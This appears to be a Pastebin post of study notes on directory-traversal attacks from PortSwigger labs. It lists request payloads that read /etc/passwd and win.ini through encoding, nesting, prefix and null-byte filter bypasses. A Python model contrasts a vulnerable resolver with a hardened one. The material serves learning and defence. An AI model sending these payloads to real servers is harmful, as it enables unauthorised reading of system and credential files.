
Untitled

a guest
Jul 11th, 2022
Sup everyone, currently doing all the PortSwigger labs to prepare for a certification. I'm doing all the labs, so there will be plenty of repetition like this; anyway, hope you enjoy and that it helps someone out.

So if we consider a web app showing some images, the HTML would look something like this: [B]<img src="/loadimage?filename=image.png">[/B]. The loadimage endpoint takes a filename and returns the contents of that file using a filesystem API.

The default image location is [B]/var/www/images/[/B], so if there is no filter or validation rule stopping us from moving between directories we could read arbitrary files. [B]../[/B] means to go up one directory (into the parent), so if we input [B]../../../[/B] we end up in the root directory, basically skipping [B]/var/www/images/[/B].

So for a PoC we could request [B]https://vuln.com/loadimage?filename=../../../etc/passwd[/B] and we would be able to read /etc/passwd. On a Windows server this would be [B]https://vuln.com/loadimage?filename=..\..\..\windows\win.ini[/B] (on Windows both [B]../[/B] and [B]..\[/B] are valid traversal sequences).

Some ways of circumventing the filtering rules (if poorly written): try the absolute path, [B]filename=/etc/passwd[/B], which contains no traversal sequence at all; or try a nested traversal sequence like [B]....//[/B] or [B]....\/[/B], which, when the filter strips [B]../[/B] only once (non-recursively), has the inner [B]../[/B] removed and leaves a [B]../[/B] behind.

In some contexts, such as a URL path or the filename parameter of a multipart/form-data request, web servers may strip any directory traversal sequences before passing your input to the application. You can try URL encoding or double URL encoding, i.e. [B]%2e%2e%2f[/B] or [B]%252e%252e%252f[/B], so the sequence only becomes [B]../[/B] once the application decodes it again. Some non-standard encodings like [B]..%c0%af[/B] or [B]..%ef%bc%8f[/B] (an overlong UTF-8 form of [B]/[/B] and the fullwidth solidus, which some decoders map to [B]/[/B]) may also work.

Some web apps require that the filename starts with the expected base folder, /var/www/images, so [B]filename=/var/www/images/../../../etc/passwd[/B] could also get you past that check, since the prefix is present and the [B]../[/B] sequences after it still walk out of the folder.

If the web app requires that the user input ends with an expected file extension, for example .png, you might be able to bypass this with a null byte: [B]https://vuln.com/loadimage?filename=../../../etc/passwd%00.png[/B]. The validation sees the .png suffix, but a C-style filesystem API stops reading the string at the null byte and opens /etc/passwd.
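To see how each of these bypasses plays out against the check it targets, here is an added Python model (written for this page, not code from PortSwigger or from the original paste). It assumes the hypothetical base directory /var/www/images from the notes, models the back end on Unix only, and its names (vulnerable_resolve, safe_resolve, strip_once, BYPASSES and so on) are invented for illustration. The same block also shows the hardened resolver a practitioner would want instead: decode once, reject NUL bytes and leftover percent-encoding, canonicalise with realpath, and check containment with commonpath.

```python
import os
import urllib.parse

# Assumed base directory from the notes above (hypothetical, not a real deployment).
BASE_DIR = "/var/www/images"


# --- weak checks, one per bypass described in the notes ---------------------

def strip_once(path):
    """Non-recursive sanitiser: removes every '../' and '..\\' in a single pass,
    so '....//' collapses to '../' instead of disappearing."""
    return path.replace("../", "").replace("..\\", "")


def starts_with_base(path):
    """Prefix check: only looks at how the input *begins*."""
    return path.startswith(BASE_DIR)


def ends_with_png(path):
    """Extension check: only looks at how the input *ends*."""
    return path.endswith(".png")


# --- toy model of the lab back end -------------------------------------------

def vulnerable_resolve(raw, server_filter=None, app_check=None):
    """Return the path the vulnerable app would actually open, or None if the
    request is rejected.  Stages, in order, mimic the lab set-up:
      1. the front-end server URL-decodes the parameter once and may sanitise it;
      2. the application URL-decodes it again (the 'superfluous decode' case);
      3. the application may run a prefix/suffix check on the decoded string;
      4. a C-style file API stops reading at the first NUL byte;
      5. the name is joined to BASE_DIR with os.path.join, which drops BASE_DIR
         entirely when the name is absolute, and the result is normalised.
    Unix separators only; the Windows '..\\' variant is not modelled."""
    path = urllib.parse.unquote(raw)
    if server_filter is not None:
        path = server_filter(path)
    path = urllib.parse.unquote(path)
    if app_check is not None and not app_check(path):
        return None
    path = path.split("\x00", 1)[0]
    return os.path.normpath(os.path.join(BASE_DIR, path))


def safe_resolve(raw):
    """Hardened resolver: decode once, refuse NUL bytes and leftover encoding,
    canonicalise with realpath (which resolves '..' and symlinks), then require
    the result to stay under the real base directory."""
    name = urllib.parse.unquote(raw)
    if "\x00" in name or "%" in name:
        raise ValueError("rejected: NUL byte or double-encoded input")
    base = os.path.realpath(BASE_DIR)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("rejected: %r escapes %s" % (raw, base))
    return candidate


# Constructed payloads: (label, payload, server-side filter, application-side check)
BYPASSES = [
    ("no filter",            "../../../etc/passwd",                None,       None),
    ("absolute path",        "/etc/passwd",                        strip_once, None),
    ("nested sequence",      "....//....//....//etc/passwd",       strip_once, None),
    ("double URL encoding",  "%252e%252e%252f" * 3 + "etc/passwd", strip_once, None),
    ("base-folder prefix",   BASE_DIR + "/../../../etc/passwd",    None,       starts_with_base),
    ("extension + NUL byte", "../../../etc/passwd%00.png",         None,       ends_with_png),
]


def run_bypasses():
    """Map each bypass label to the path the vulnerable resolver opens."""
    return {label: vulnerable_resolve(raw, flt, chk)
            for label, raw, flt, chk in BYPASSES}


def run_hardened():
    """Feed the same payloads to safe_resolve.  Returns {label: outcome}, where
    outcome is 'rejected' or the in-base path that would be opened."""
    outcomes = {}
    for label, raw, _, _ in BYPASSES:
        try:
            outcomes[label] = safe_resolve(raw)
        except ValueError:
            outcomes[label] = "rejected"
    return outcomes


if __name__ == "__main__":
    for label, opened in run_bypasses().items():
        print("%-22s -> %s" % (label, opened))
    for label, outcome in run_hardened().items():
        print("hardened: %-22s -> %s" % (label, outcome))
    print("legit request opens", safe_resolve("image.png"))
```

Every payload in BYPASSES comes out of vulnerable_resolve as /etc/passwd, while a single-encoded %2e%2e%2f is caught by the strip-once filter because the server decodes before stripping, which is exactly why the double encoding is needed. Against safe_resolve, the nested sequence is the one payload that is not "rejected": after canonicalisation it points at a non-existent ..../..../.... subdirectory inside the base folder, so it never escapes. That is the point of checking containment of the canonical path instead of pattern-matching the input.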
  16.  
  17.  
  18. -Admin/0xgh64